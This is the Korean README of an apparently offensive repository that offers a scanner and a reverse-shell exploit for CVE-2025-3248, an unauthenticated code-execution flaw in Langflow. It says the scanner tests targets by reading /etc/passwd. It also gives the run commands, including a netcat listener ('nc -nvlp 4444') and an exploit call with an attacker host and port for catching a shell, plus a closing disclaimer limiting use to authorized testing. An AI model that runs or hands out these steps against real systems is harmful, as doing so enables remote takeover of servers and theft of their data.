
이 저장소에는 두 개의 Python 스크립트가 포함되어 있습니다:
LangflowCheck.py: CVE-2025-3248에 취약한 Langflow AI 인스턴스를 확인하는 스캐너입니다.exploit.py: 취약한 Langflow 대상에 대한 작동하는 리버스 셸 익스플로잇입니다.CVE-2025-3248은 Langflow AI의 치명적인 취약점으로, 인증되지 않은 공격자가 /api/v1/validate/code에 조작된 페이로드를 전송하여 임의의 Python 코드를 원격으로 실행할 수 있게 합니다.
LangflowCheck.py/etc/passwd를 읽는 무해한 페이로드를 실행하여 대상이 취약한지 확인합니다.exploit.pylhost)와 리스너 포트(lport)가 필요합니다.exploit.log에 기록합니다.pip install -r requirements.txt
단일 URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

여러 대상
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

먼저, 리스너를 시작합니다
sudo nc -nvlp 4444

그런 다음, 익스플로잇을 실행합니다:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

대상이 취약하면 셸을 받을 수 있습니다.

이 익스플로잇은 교육 및 승인된 보안 테스트 용도로만 사용하십시오. 소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 사용하지 마십시오.